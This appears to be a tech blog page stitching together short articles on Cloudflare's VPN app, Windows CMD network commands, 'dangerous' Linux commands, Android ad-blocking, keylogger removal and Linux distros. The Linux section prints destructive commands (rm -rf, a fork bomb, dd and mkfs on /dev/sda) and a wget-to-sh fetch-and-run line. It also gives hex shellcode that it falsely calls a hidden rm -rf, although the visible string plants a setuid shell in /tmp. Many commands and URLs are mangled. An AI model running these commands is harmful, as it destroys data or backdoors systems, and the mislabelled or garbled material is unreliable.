Wednesday, January 1, 2020

How To Use Cloudflare’s New VPN Service On Android

How To Use Cloudflare’s New VPN Service On Android

How To Use Cloudflare’s New VPN Service On Android

How To Use Cloudflare's New VPN Service On Android

Step 1. First of all, download & install Cloudflare’s app on your Android smartphone.
Step 2. Once downloaded, open the app and then tap on ‘Get Started’
Step 3. Now you will see a screen like below. You can either read the information or tap on the ‘Next’ button.
Step 4. Now you will see a screen like below.
Step 5. Now tap on the ‘Enable’ button at the bottom of the screen and then tap on the toggle button.
Step 6. Now you will be asked to install the VPN profile. Simply tap on the ‘Install VPN Profile’ button and then tap on ‘Ok’

Top 15 Best CMD Commands Used In Hacking

Top 15 Best CMD Commands Used In Hacking

Top 15 Best CMD Commands Used In Hacking.

Image result for cmd

1. ping

This command uses your internet connection in order to send some packets of data to a specific web address then these packets are sent back to your PC. The test simply shows the amount of time it took to reach the specific address. In simple words, it helps you to know if the host you pinging is alive.
You can use the Ping command whenever you need to verify that the host computer can connect to the TCP/IP network and its resources.
For example, you can type in Command prompt ping which belongs to Google.
You can replace “” to “” or something else which you want to ping.

2. nslookup

It is a network administration command-line tool that helps you to obtain domain name or IP address mapping for any specific DNS record. Suppose you have a website URL but want to know its IP Address, you can simply type in CMD
nslookup (Replace with your website URL of which you want to find the IP address)

3. tracert

You can say Trace Route like its name it allows users to trace the route than an IP packed has taken to reach a destination. The command calculates and displays the amount of time each hop took to reach a destination. You just need to type
tracert x.x.x.x (if you know the IP Address) or else you can type tracert (If you don’t know the IP address)

4. arp

This command helps you to modify the ARP cache. You can run an arp-a command on each computer to see whether the computers have the correct MAC address listed for each other to ping each other succeed on the same subnet.
This command also helps users to find out if anyone has done arp poisoning in their LAN.
You can try typing arp-a in command prompt.

5. ipconfig

This is the command which shows every useful thing. It will show you IPv6 address, temporary IPv6 address, IPv4 address, Subnet Mask, Default gateway and all other things that you want to know.
You can type in command prompt “ipconfig” or "ipconfig/all"

6. netstat

If you want to find out who is establishing a connection with your computer then you might try typing in command prompt “netstat -a” it will display all the connection and you will get to know about the active connections and listening ports.
Type in command prompt "netstat -a"

7. Route

It is a command which is used to view and manipulate the IP routing table in the Microsoft Windows operating system. This command will show you routing table, metric and interface.
You can type in command prompt "route print"

8. Net View

This command displays the whole list of resources, computers or domains that are shared by the specified computer.
You can type in command prompt "net view x.x.x.x or computername"

9. Net User

Well, this command is used to modify changes to user accounts on a computer. You can add, remove users with the help of this command
You can use these commands while using net user
net user [<UserName> {<Password> | *} [<Options>]] [/domain] net user [<UserName> {<Password> | *} /add [<Options>] [/domain]] net user [<UserName> [/delete] [/domain]]

10. Net Use

This command is been used to connect, remove and configure connections to shared resources like network printers and other mapped drives. The use of this command is a little bit complicated. So, we recommend you to visit the Microsoft site to get full details on how to use this command.

11. Tasklist

This command opens up an entire task manager on the command prompt. Users just need to enter the tasklist on CMD and they will see the list of all running processes. You can figure out all the wrongs with these commands.
Moreover, the command can also be used when you need to forcefully close any process. For example, if you want to kill PID 1532 process then you can enter the command: taskkill /PID 1532 /F

12. iexplore

As we all know, hackers often try to execute some apps, such as web browsers. So, hackers use the iexplore option to execute apps and web pages. For example, if you enter iexplore on the command prompt, it will open the URL in Internet Explorer.
Not only these, but you can even use iexplore <IP address> to find sites running on any particular IP address. The command is used in multiple ways by the hackers.

13. Pathping

Well, pathping command is pretty much similar to the tracert, but it shows more detailed information. The commands take a few moments to complete as it analyzes the route taken and computes packet loss. On Windows command prompt, just type in the following command
pathping (Replace with the one that you want to ping)

14. Getmac

Getmac commands are mostly used to get the MAC Address. As we all know, MAC addresses are assigned by the manufacturer and stored on the hardware. With each network connected adapters, you get a separate MAC address. For instance, your Ethernet, WiFi would have the separate MAC address. So, getmac command is used to fetch the MAC address stored in the device’s hardware.

15. Netsh

With netsh command, you can configure almost every part of your network adapter. The great thing about the network shell command is that it provides more detailed information about your network adapters compared to all others listed in the article.
If you just enter the netsh command, it will list you all routing and DHCP related commands that you need to diagnostic purpose.

10 Most Dangerous Linux Commands You Should Never Execute

10 Most Dangerous Linux Commands You Should Never Execute

10 Most Dangerous Linux Commands You Should Never Execute

Image result for linux commands

1. rm -rf

The rm -rf command is one of the fastest ways to delete a folder and its contents. But a little typing error or ignorance can result in unrecoverable damage to the system. Some of the options used with the rm command are like Rm -r command deletes the folder recursively, even the empty folder. rm -f Command removes “only read the file ‘without asking. It also has the power to eliminate all files present in the root directory.

2.: () {: |: &} ;:

The above command is the fork bomb. It operates by defining a function called ”, which is called twice, once in the foreground and once in the background. It keeps running again and again until the system freezes.

3. command> / dev / sda

The above command writes the output of ‘command on the block / dev / sda . The above command writes raw data and all files on the block will be replaced with raw data, resulting in total loss of data in the block.

4. mv directory / dev / null

This command basically moves all the files to / dev / null, yes, it means that it simply disappear all the files from the system.

5. wget http: // malicious_source -O | sh

The above command will download a script from a malicious source and then run it on your system. The Wget command will download the script and sh command will run the downloaded script on your system.

6. Mkfs.ext3 / dev / sda

The above command will simply format the block ‘sda’ and you will definitely know that after running the above command your Block (Hard Disk Drive) will be reset to NEW! Without the data, leaving the system in unrecoverable phase.

7. > File

The above command is used to release the file content. If the above command is executed with a typing error or ignorance as “> xt.conf” will write the configuration file or any other system or configuration file.

8. ^ foo ^ bar

This command is used to edit the previous command without the need to retype the entire command again. But it can be really problematic if you do not take the risk to carefully check the change in the original command using ^ ^ foo bar command.

9. dd if = / dev / random of = / dev / sda

The above command will end as / dev / sda and write random data for the block. Of course! Your system would be left in an inconsistent and unrecoverable phase.

10. invisible Command

The following command is nothing more than the first command of this article ( rm-rf ). Here the codes are hidden in hex to an ignorant user can be fooled. Running the code below into your terminal and clear your root partition.
This command here shows that the threat can be hidden and usually undetectable sometimes. You should be aware of what you are doing and what would be the result. Not compile / run code from an unknown source.
char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;

How To Block Ads On Android Using Private DNS

How To Block Ads On Android Using Private DNS

How To Block Ads On Android Using Private DNS

Image result for block ads

How To Block Ads Using Private DNS

Please ensure that your phone is running on Android 9 Pie operating system. If it’s running on Pie, then follow some of the simple steps given below.
Step 1. First of all, open your Android’s app drawer and tap on ‘Settings’
Step 2. Under the Settings tab, you need to select ‘Network & Internet’ or Wireless & Networks.
Step 3. Under the Network & Internet Settings, select ‘Private DNS’
Step 4. Now you need to select the option ‘Configure Private DNS’
Step 5. Under the hostname, type in ''
Step 6. Save the settings and open the Google Chrome browser.
Step 7. On the URL bar, enter "Chrome://flags" and hit Enter.
Step 8. Now search for ‘DNS’ and then disable the ‘Async DNS’ option.
Step 9. Now enter "chrome://net-internals" in the URL bar and hit enter.
Step 10. Select the DNS tab, and then tap on ‘Clear Cache’ option.
That’s it! You are done! Now restart your chrome browser to apply the changes.

How to Remove Hidden Keyloggers from your Android

How to Remove Hidden Keyloggers from your Android

How to Remove Hidden Keyloggers from your Android

1. Find The Source

The first step for you is to know how keyloggers enter smartphone. One is if anyone used your device and then inserted the bad script inside it, another one is that the apps you installed from the third-party sources included the malware along with the keyloggers. You should identify it by yourself whether or not you have any suspect from both of these if any then it could become the lot easier to remove the keyloggers.
Find the actual source
Find the actual source

2. Check For Unusual Activities

Second thing is that you should check for the unfamiliar and the suspicious things happening on your device. Like any script is causing your device to reboot often or any kind of numbers tend to appear on the screen. You also need to look for suspicious apps. If anything like this is happening then again it is the sign that your device is conquered by the keyloggers.
Check For Unusual Activities
Check For Unusual Activities

3. Use Antimalware

How can you remove the keyloggers then? This is really simple first of all use any antivirus app and scan for the malware. If the antivirus app finds any malware, remove it. Secondly, find the affected app that is using a lot of data even in the background. Uninstall that app and then restart your device. All this will surely help to remove any kind of keyloggers on your device.
Use Antimalware
Use Antimalware

After removing the keylogger or spyware app, make sure to download and install a proper antimalware app. We recommend the use of Malwarebytes to further protect your Android device from security threats like spyware, keyloggers, etc.

4. Check File Manager & Download Folder

Look inside the file manager for each of the folders and find if there are any hidden files that might be the keylogger, just remove that. This could be time-consuming but as you know your device will become safer to use in the end. Also, check the installed apps section of your Android. If you find any suspicious apps, remove it as soon as possible.
Check File Manager & Download Folder
Check File Manager & Download Folder
So, this is all about how to remove the hidden keyloggers from Android. I hope this article helped you! Share it with your friends also.

5 Best Linux Distros for Windows Users

5 Best Linux Distros for Windows Users

5 Best Linux Distros for Windows Users

1. Robolinux

This is one of the best OS that is one of Linux distro and is user-friendly too. As windows, users seeking user-friendly OS like Windows this OS is the best fit for all that users. RoboLinux is a robust Linux desktop solution for a home office, as well as for SOHO and enterprise users looking for a well-protected migration path away from other operating systems.

2. Linux Mint

Linux Mint
Linux Mint
Another well known OS that is known for its UI that is again very user-friendly and also there are lots of cool features that you will be loving while using this OS. The purpose of Linux Mint is to produce a modern, elegant and comfortable operating system which is both powerful and easy to use.

3. ChaletOS

We all know someone who tried to switch to Linux but was unsuccessful. The system that he tried was too different from what he was used to, there were too many new things and the old things were not where he expected. The goal of this project is to let anyone use Linux. This system is not too different from Xubuntu, on which it is based, but ChaletOS has a style that everyone knows well, appealing simplicity and impressive speed.

4. Zorin OS

Zorin OS
Zorin OS
Last but not least, this OS is one of the best OS that you will surely love to use on your PC. Zorin OS is a multi-functional operating system designed specifically for newcomers to Linux. It’s based on Ubuntu Linux, so you can rely on it for rock-solid performance, dependability, and support.

5. Kubuntu

This is one of the most lightweight and user-friendly Linux distros you can use. The interface of Kubuntu is highly customizable, doesn’t have most of the disadvantages with Ubuntu. Even Microsoft has just ported the Powershell in Kubuntu which makes the operating system more friendly to Windows users.